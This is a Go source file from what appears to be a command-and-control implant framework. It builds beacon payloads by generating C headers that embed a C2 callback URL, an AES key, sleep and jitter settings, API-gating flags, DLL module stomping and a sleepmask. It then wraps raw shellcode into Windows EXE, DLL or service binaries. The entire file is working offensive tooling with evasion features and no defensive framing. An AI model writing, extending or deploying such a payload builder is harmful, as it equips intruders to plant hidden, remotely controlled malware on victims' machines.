package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
	"sync"
)

var buildMu sync.Mutex

func writeCharWriteMacro(buf *bytes.Buffer, name string, s string, perLine int, wide bool) {
	fmt.Fprintf(buf, "#define %s( p ) do { \\\n", name)
	for i, c := range s {
		if i%perLine == 0 {
			buf.WriteString("    ")
		}
		if wide {
			fmt.Fprintf(buf, "(p)[%2d]=L'%c'; ", i, c)
		} else {
			fmt.Fprintf(buf, "(p)[%2d]='%c'; ", i, c)
		}
		if i%perLine == perLine-1 {
			buf.WriteString("\\\n")
		}
	}
	if len([]rune(s))%perLine != 0 {
		buf.WriteString("\\\n")
	}
	if wide {
		fmt.Fprintf(buf, "    (p)[%2d]=L'\\0'; \\\n", len([]rune(s)))
	} else {
		fmt.Fprintf(buf, "    (p)[%2d]='\\0'; \\\n", len(s))
	}
	buf.WriteString("} while(0)\n")
}

func writeBytesWriteMacro(buf *bytes.Buffer, name string, data []byte, perLine int, fieldWidth int) {
	fmt.Fprintf(buf, "#define %s( p ) do { \\\n", name)
	for i, b := range data {
		if i%perLine == 0 {
			buf.WriteString("    ")
		}
		fmt.Fprintf(buf, "(p)[%*d]=0x%02X; ", fieldWidth, i, b)
		if i%perLine == perLine-1 {
			buf.WriteString("\\\n")
		}
	}
	if len(data)%perLine != 0 {
		buf.WriteString("\\\n")
	}
	buf.WriteString("} while(0)\n")
}

// writeBytesWriteMacro64 emits a WRITE macro using 8-byte stores. Per-byte
// stores cause GCC's optimizer to spend minutes on large blobs (64K+);
// 8-byte stores reduce AST nodes 8x and compile in seconds at -Os.
func writeBytesWriteMacro64(buf *bytes.Buffer, name string, data []byte) {
	fmt.Fprintf(buf, "#define %s( p ) do { \\\n", name)
	i := 0
	for i+8 <= len(data) {
		val := binary.LittleEndian.Uint64(data[i:])
		fmt.Fprintf(buf, "    *(unsigned long long*)((p)+%d) = 0x%016XULL; \\\n", i, val)
		i += 8
	}
	for i < len(data) {
		fmt.Fprintf(buf, "    (p)[%d]=0x%02X; \\\n", i, data[i])
		i++
	}
	buf.WriteString("} while(0)\n")
}

// writeIfChanged writes data to path only when the content differs from what's
// already on disk. This preserves the file's mtime so Make's auto-deps skip
// recompilation of objects that depend on the file.
func writeIfChanged(path string, data []byte) error {
	if existing, err := os.ReadFile(path); err == nil && bytes.Equal(existing, data) {
		return nil
	}
	return os.WriteFile(path, data, 0644)
}

// generateConfigH produces the main Config.h (readable, small) and returns it.
// generateProfileH produces the separate Config_profile.h (large WRITE macro).
// Both are called by BuildPayload and written to src_beacon/include/.
func generateConfigH(host string, port int, path string, key []byte, sleepMs uint32, jitterPct uint32, profileBytes []byte, watermark uint32, listenerWatermark uint32, gateAPIs []string, ssl bool) []byte {
	if len(key) != 16 {
		panic(fmt.Sprintf("generateConfigH: key must be 16 bytes, got %d", len(key)))
	}
	scheme := "http"
	defaultPort := 80
	if ssl {
		scheme = "https"
		defaultPort = 443
	}
	var url string
	if port == defaultPort {
		url = fmt.Sprintf("%s://%s%s", scheme, host, path)
	} else {
		url = fmt.Sprintf("%s://%s:%d%s", scheme, host, port, path)
	}

	keyHex := fmt.Sprintf("%x", key)

	var buf bytes.Buffer

	// Header banner with human-readable summary
	buf.WriteString("/* Config.h - generated by BuildPayload\n")
	buf.WriteString(" *\n")
	fmt.Fprintf(&buf, " *   C2 URL:   %s\n", url)
	fmt.Fprintf(&buf, " *   AES Key:  %s\n", keyHex)
	fmt.Fprintf(&buf, " *   Sleep:    %d ms   Jitter: %d%%\n", sleepMs, jitterPct)
	if len(profileBytes) > 0 {
		fmt.Fprintf(&buf, " *   Profile:  v2, %d bytes\n", len(profileBytes))
	}
	buf.WriteString(" */\n\n")
	buf.WriteString("#pragma once\n\n")

	// Scalar defines
	fmt.Fprintf(&buf, "#define NAX_SLEEP_MS    %du\n", sleepMs)
	fmt.Fprintf(&buf, "#define NAX_JITTER_PCT  %du\n", jitterPct)
	buf.WriteString("#define NAX_SID_LEN     17u\n")
	fmt.Fprintf(&buf, "#define NAX_WATERMARK   0x%08Xu\n", watermark)
	fmt.Fprintf(&buf, "#define NAX_LISTENER_WM 0x%08Xu\n\n", listenerWatermark)

	// BeaconGate compile-time flags - NAX_GATE_ + TOUPPER(FunctionName)
	for _, api := range gateAPIs {
		fmt.Fprintf(&buf, "#define NAX_GATE_%s\n", strings.ToUpper(api))
	}
	if len(gateAPIs) > 0 {
		buf.WriteString("\n")
	}

	buf.WriteString("/* PIC-safe per-byte writes - prevents GCC from pooling into .rdata */\n")
	writeBytesWriteMacro(&buf, "NAX_AES_KEY_WRITE", key, 8, 2)
	buf.WriteString("\n")
	writeCharWriteMacro(&buf, "NAX_C2_URL_WRITE", url, 8, false)
	buf.WriteString("\n")

	// Profile - length define here, WRITE macro in separate file
	if len(profileBytes) > 0 {
		fmt.Fprintf(&buf, "#define NAX_PROFILE_LEN  %du\n", len(profileBytes))
		buf.WriteString("#include \"Config_profile.h\"\n")
	}

	return buf.Bytes()
}

// generateBofStompConfig appends BOF module stomping defines to a Config.h buffer.
// syncDll is the single DLL for sync BOF; asyncDlls is the pool for async BOFs.
// Uses WCHAR per-element WRITE macros (L'x') - PIC-safe, same pattern as NAX_C2_URL_WRITE.
func generateBofStompConfig(buf *bytes.Buffer, enabled bool, syncDll string, asyncDlls []string, smStompDll string) {
	buf.WriteString("\n/* ---- BOF module stomping ---- */\n")
	if !enabled {
		buf.WriteString("#define NAX_BOF_STOMP 0\n")
		return
	}
	buf.WriteString("#define NAX_BOF_STOMP 1\n\n")

	writeCharWriteMacro(buf, "NAX_BOF_SYNC_DLL_WRITE", syncDll, 4, true)
	buf.WriteString("\n")

	// Async DLLs - count + per-DLL write macros
	count := len(asyncDlls)
	if count > 4 {
		count = 4
	}
	fmt.Fprintf(buf, "#define NAX_BOF_ASYNC_COUNT %d\n", count)

	for idx := 0; idx < count; idx++ {
		buf.WriteString("\n")
		writeCharWriteMacro(buf, fmt.Sprintf("NAX_BOF_ASYNC_%d_WRITE", idx), asyncDlls[idx], 4, true)
	}

	if smStompDll != "" {
		buf.WriteString("\n/* ---- sleepmask stomp DLL ---- */\n")
		writeCharWriteMacro(buf, "NAX_SM_STOMP_DLL_WRITE", smStompDll, 4, true)
	}
}

// generateProfileH produces Config_profile.h containing only the large
// NAX_PROFILE_WRITE macro. Kept separate so Config.h stays readable.
func generateProfileH(profileBytes []byte) []byte {
	var buf bytes.Buffer

	buf.WriteString("/* Config_profile.h - auto-generated profile WRITE macro\n")
	fmt.Fprintf(&buf, " * %d bytes, included by Config.h */\n\n", len(profileBytes))

	writeBytesWriteMacro(&buf, "NAX_PROFILE_WRITE", profileBytes, 8, 3)

	return buf.Bytes()
}

// generateSmbConfigH produces Config.h for the SMB transport variant.
// No profile embedding - SMB child uses raw pipe framing, not HTTP malleable profile.
func generateSmbConfigH(pipeName string, key []byte, sleepMs uint32, jitterPct uint32, watermark uint32, listenerWatermark uint32, gateAPIs []string) []byte {
	if len(key) != 16 {
		panic(fmt.Sprintf("generateSmbConfigH: key must be 16 bytes, got %d", len(key)))
	}
	keyHex := fmt.Sprintf("%x", key)

	var buf bytes.Buffer

	buf.WriteString("/* Config.h - generated by BuildPayload (SMB)\n")
	buf.WriteString(" *\n")
	fmt.Fprintf(&buf, " *   Pipe:     %s\n", pipeName)
	fmt.Fprintf(&buf, " *   AES Key:  %s\n", keyHex)
	fmt.Fprintf(&buf, " *   Sleep:    %d ms   Jitter: %d%%\n", sleepMs, jitterPct)
	buf.WriteString(" */\n\n")
	buf.WriteString("#pragma once\n\n")

	fmt.Fprintf(&buf, "#define NAX_SLEEP_MS    %du\n", sleepMs)
	fmt.Fprintf(&buf, "#define NAX_JITTER_PCT  %du\n", jitterPct)
	buf.WriteString("#define NAX_SID_LEN     17u\n")
	fmt.Fprintf(&buf, "#define NAX_WATERMARK   0x%08Xu\n", watermark)
	fmt.Fprintf(&buf, "#define NAX_LISTENER_WM 0x%08Xu\n\n", listenerWatermark)

	for _, api := range gateAPIs {
		fmt.Fprintf(&buf, "#define NAX_GATE_%s\n", strings.ToUpper(api))
	}
	if len(gateAPIs) > 0 {
		buf.WriteString("\n")
	}

	writeBytesWriteMacro(&buf, "NAX_AES_KEY_WRITE", key, 8, 2)
	buf.WriteString("\n")
	writeCharWriteMacro(&buf, "NAX_C2_URL_WRITE", pipeName, 8, false)
	buf.WriteString("\n")

	return buf.Bytes()
}

// generateSleepmaskH produces Config_sleepmask.h containing the embedded
// sleepmask BOF WRITE macro. Kept separate so Config.h stays readable.
func generateSleepmaskH(bofBytes []byte) []byte {
	var buf bytes.Buffer

	buf.WriteString("/* Config_sleepmask.h - auto-generated sleepmask BOF embed\n")
	fmt.Fprintf(&buf, " * %d bytes, included by Config.h */\n\n", len(bofBytes))

	writeBytesWriteMacro64(&buf, "NAX_SLEEPMASK_WRITE", bofBytes)

	return buf.Bytes()
}

/* ========= [ PE wrapper compilation ] ========= */

func generateShellcodeH(blob []byte) []byte {
	var buf bytes.Buffer
	buf.WriteString("#pragma once\n\n")
	buf.WriteString("namespace Shellcode {\n")
	buf.WriteString("    __attribute__((used, section(\".text\")))\n")
	buf.WriteString("    unsigned char Data[] = {\n")

	for i, b := range blob {
		if i%16 == 0 {
			buf.WriteString("        ")
		}
		fmt.Fprintf(&buf, "0x%02X,", b)
		if i%16 == 15 || i == len(blob)-1 {
			buf.WriteString("\n")
		} else {
			buf.WriteByte(' ')
		}
	}

	buf.WriteString("    };\n")
	buf.WriteString("}\n")
	return buf.Bytes()
}

func compileWrapper(pic []byte, format, svcName, dllExport string, debug bool, logFn func(int, string, ...any)) ([]byte, string, error) {
	tmpDir, err := os.MkdirTemp("", "nax_pe_wrap_")
	if err != nil {
		return nil, "", fmt.Errorf("create temp dir: %w", err)
	}
	defer os.RemoveAll(tmpDir)

	if err := os.WriteFile(filepath.Join(tmpDir, "Shellcode.h"), generateShellcodeH(pic), 0644); err != nil {
		return nil, "", fmt.Errorf("write Shellcode.h: %w", err)
	}

	tplDir := filepath.Join(resolveNaxRoot(), "src_server", "agent_nonameax", "pe_templates")

	var sourceFile, outName string
	var extraFlags []string

	switch format {
	case "exe":
		sourceFile = filepath.Join(tplDir, "Exe.cc")
		outName = "nax.x64.exe"
	case "dll":
		sourceFile = filepath.Join(tplDir, "Dll.cc")
		outName = "nax.x64.dll"
		extraFlags = append(extraFlags, "-shared")
	case "svc":
		sourceFile = filepath.Join(tplDir, "Svc.cc")
		outName = "nax.x64.svc.exe"
		extraFlags = append(extraFlags, "-ladvapi32")
	default:
		return nil, "", fmt.Errorf("unknown PE format: %s", format)
	}

	if debug {
		outName = strings.Replace(outName, "nax.x64", "nax.x64.debug", 1)
	}

	outPath := filepath.Join(tmpDir, outName)

	subsystem := "-mwindows"
	if debug {
		subsystem = "-mconsole"
	}

	args := []string{
		"-I", tmpDir,
		"-I", tplDir,
		"-o", outPath,
		sourceFile,
		"-Os", subsystem,
		"-nostdlib", "-s",
		"-Wl,-eWinMainCRTStartup",
		"-lkernel32",
	}

	if format == "svc" {
		svcDefine := fmt.Sprintf("-DNAX_SVC_NAME=L\"%s\"", svcName)
		args = append(args, svcDefine)
	}

	args = append(args, extraFlags...)

	if format == "dll" && dllExport != "" && dllExport != "Runner" {
		defPath := filepath.Join(tmpDir, "exports.def")
		defContent := fmt.Sprintf("EXPORTS\n  %s=Runner\n", dllExport)
		if err := os.WriteFile(defPath, []byte(defContent), 0644); err != nil {
			return nil, "", fmt.Errorf("write exports.def: %w", err)
		}
		args = append(args, defPath)
	}

	compiler := "x86_64-w64-mingw32-g++"
	if logFn != nil {
		logFn(1, "PE wrapper: %s %s → %s", compiler, format, outName)
	}

	cmd := exec.Command(compiler, args...)
	cmdOut, cmdErr := cmd.CombinedOutput()
	if cmdErr != nil {
		return nil, "", fmt.Errorf("%s failed: %v\n%s", compiler, cmdErr, string(cmdOut))
	}

	peBytes, err := os.ReadFile(outPath)
	if err != nil {
		return nil, "", fmt.Errorf("read output PE: %w", err)
	}

	if logFn != nil {
		logFn(3, "PE wrapper: %s built (%d bytes)", outName, len(peBytes))
	}

	return peBytes, outName, nil
}
